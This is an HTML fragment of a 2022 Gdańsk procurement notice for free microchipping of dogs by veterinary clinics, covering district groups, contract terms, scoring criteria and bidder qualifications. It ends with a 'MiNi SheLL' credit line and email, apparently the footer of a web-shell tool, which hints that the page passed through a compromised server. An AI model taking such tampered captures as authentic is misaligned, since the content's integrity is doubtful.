100<br/>3.	Wzgórze Mickiewicza, Piecki-Migowo, Suchanino, Siedlce	100<br/>4.	Śródmieście, Olszynka, Rudniki, Wyspa Sobieszowska, Krakowiec – Górki Zachodnie, Stogi, Przeróbka	100<br/>5.	Aniołki, Młyniska, Letnica, Nowy Port, Brzeźno, Zaspa – Rozstaje, Zaspa – Młyniec, Wrzeszcz Dolny i Górny	100<br/>6.	Brętowo, VII Dwór, Strzyża, Przymorze Małe, Przymorze Wielkie, Żabianka – Wejhera – Jelitkowo - Tysiąclecia, Oliwa	100<br/><br/> 1.3 Ilość identyfikacji w okresie obowiązywania umowy w zależności od posiadanych środków finansowych i potrzeb może ulec zmniejszeniu. <br/>Ilość identyfikacji, dla wszystkich rejonów, nie może przekroczyć planowanej liczby 600 zabiegów.<br/>1.3.a. Zamawiający odrzuci ofertę z najniższą ceną, jeżeli ta cena będzie niższa o ponad 30% od średniej cen złożonych ofert dla wszystkich rejonów.<br/><br/>2. Realizacja usług, o których mowa w pkt.1 polega na:<br/>2.1. Wszczepianie musi być potwierdzone wydaniem właścicielom psów poddanych<br/>wszczepieniu zaświadczenia o wszczepieniu elektronicznych identyfikatorów.<br/><br/>2.2. Zakładom weterynaryjnym, które będą wykonywały zabiegi wszczepienia<br/>elektronicznych identyfikatorów druki zaświadczeń wszczepień zapewnia Zamawiający.<br/><br/>2.3. Lekarze świadczący usługi według zawartej umowy zobowiązują się do propagowania wśród klientów swoich zakładów będących właścicielami lub dzierżycielami psów idei trwałego znakowania swoich psów.<br/><br/>2.4. Przed dokonaniem zabiegu wszczepienia elektronicznego identyfikatora lekarz winien dokonać sprawdzenia czy pies jest już oznakowany i czy identyfikator przeznaczony do wszczepienia jest sprawny.<br/><br/>2.5. Nie dopuszcza się pobierania od właścicieli psów opłat za usługę wszczepiania<br/>elektronicznych identyfikatorów w ramach programu.<br/><br/>2.6. Zakłady weterynaryjne zapewniają sobie we własnym zakresie posiadanie czytników elektronicznych identyfikatorów.<br/><br/>2.7. Zakłady weterynaryjne są bezwzględnie zobowiązane do comiesięcznego<br/>przekazywania wypełnionych druków identyfikacji i rejestracji zwierzęcia do Schroniska <br/>dla Bezdomnych Zwierząt w Gdańsku - Kokoszkach przy ul. Przyrodników 14. <br/>Ostatnia karta wykonanych zabiegów winna być przekazana nie później <br/>niż do 10 grudnia 2022 roku.<br/><br/>2.8. Wynagrodzenie za wykonaną usługę będzie uiszczane przelewem na konto bankowe Wykonawcy na podstawie dostarczonej raz na miesiąc faktury w terminie 21 dni od daty <br/>jej otrzymania.<br/><br/>2.9. Zamawiający zezwala na składanie ofert częściowych na poszczególne rejony<br/>(dzielnice).<br/><br/>2.10. Wymagane dokumenty: dokument rejestracji (wpis) do Kaszubsko-Pomorskiej Izby Lekarsko-Weterynaryjnej.<br/>Termin wykonania przedmiotu zamówienia: od dnia zawarcia umowy do dnia 30.11.2022 roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostępność zakładów leczniczych w rejonie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.1.1 spełniają określone przez Zamawiającego warunki udziału w postępowaniu, dotyczące: <br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile wynika to z odrębnych<br/> przepisów <br/>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że posiada prawo wykonywania zawodu spełniając wymogi<br/>Ustawy z dnia 18.12.2003 r. o zakładach leczniczych dla zwierząt (Dz.U. z 2004 r. Nr 11, poz. 95)<br/>Posiada wpis przychodni/lecznicy/kliniki weterynaryjnej do ewidencji zakładów leczniczych dla zwierząt<br/><br/>1.1.2.	posiadania zdolności technicznej lub zawodowej: <br/>Dysponuje potencjałem technicznym tj.<br/>- przychodnią/lecznicą/klinika weterynaryjną w której będzie realizowany przedmiot umowy, zlokalizowany na terenie miasta Gdańska, wyposażony w taki sposób aby mógł wykonywać usługi opisane w przedmiocie zamówienia a także miejscem do przetrzymywania zwierząt w okresie rekonwalescencji – zał. Nr 5 do SWZ<br/>Kompetencje lub uprawnienia do prowadzenia określonej działalności gospodarczej – o ile wynika to z odrębnych przepisów – w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, że :<br/>- posiada aktualny wpis do ewidencji Zakładów Leczniczych dla Zwierząt, prowadzonej przez właściwą Radę Lekarsko-Weterynaryjną, zgodnie z ustawa z dnia 18 grudnia 2003r. o zakładach leczniczych dla zwierząt (Dz.U. z 2019 r., poz. 24) , według formuły spełnia/nie spełnia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Wykonawca składa wraz z ofertą aktualne na dzień składania ofert oświadczenie dotyczące spełniania warunków udziału w postępowaniu i przesłanek wykluczenia – wg wzoru - załącznik nr 3 do oferty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Wykonawca składa wraz z ofertą aktualne na dzień składania ofert oświadczenie dotyczące spełniania warunków udziału w postępowaniu i przesłanek wykluczenia – wg wzoru - załącznik nr 3 do oferty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wykonawca składa wraz z ofertą przedmiotowe środki dowodowe w postaci:<br/> - wykazu adresów zakładów leczniczych dla zwierząt ( w danym rejonie) wraz z nadanym numerem wpisu do rejestru zakładu leczniczych dla zwierząt – załącznik własny – dla zadania nr 3 i 4<br/> - opisu zakładu leczniczego w zakresie spełnienia warunków niezbędnych do wykonania zakresu usług opisanych w przedmiocie zamówienia – załącznik nr 5 do SWZ ( wyposażenie zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia)- dla wszystkich zadań. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> - wykazu adresów zakładów leczniczych dla zwierząt ( w danym rejonie) wraz z nadanym numerem wpisu do rejestru zakładu leczniczych dla zwierząt – załącznik własny – dla zadania nr 3 i 4<br/> - opisu zakładu leczniczego w zakresie spełnienia warunków niezbędnych do wykonania zakresu usług opisanych w przedmiocie zamówienia – załącznik nr 5 do SWZ ( wyposażenie zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia)- dla wszystkich zadań <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11	Wykonawcy występujący wspólnie.<br/>1.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>1.2.	W przypadku, o którym mowa w pkt. 8.1 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W związku z tym składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich pełnomocnika. <br/>1.3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>1.4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>1.5.	W przypadku, o którym mowa w ust. 10.4., wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com